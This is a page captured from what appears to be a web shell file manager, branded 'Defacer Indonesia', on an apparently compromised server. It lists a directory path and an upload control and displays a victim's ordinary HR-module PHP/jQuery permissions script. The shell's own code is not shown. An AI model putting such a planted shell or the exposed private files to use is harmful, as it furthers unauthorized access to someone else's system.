whoami7 - Manager
:
/
home
/
kckglobal
/
.trash
/
modules
/
hr_profile
/
assets
/
js
/
setting
/
Upload File:
files >> //home/kckglobal/.trash/modules/hr_profile/assets/js/setting/hr_profile_permissions_js.php
<script> $(function() { "use strict"; initDataTable('.table-hr-profile-permission', admin_url + 'hr_profile/hr_profile_permission_table'); }); function hr_profile_permissions_update(staff_id, role_id, add_new) { "use strict"; $("#modal_wrapper").load("<?php echo admin_url('hr_profile/hr_profile/permission_modal'); ?>", { slug: 'update', staff_id: staff_id, role_id: role_id, add_new: add_new }, function() { if ($('.modal-backdrop.fade').hasClass('in')) { $('.modal-backdrop.fade').remove(); } if ($('#appointmentModal').is(':hidden')) { $('#appointmentModal').modal({ show: true }); } }); init_selectpicker(); $(".selectpicker").selectpicker('refresh'); } </script>
Copyright ©2021 || Defacer Indonesia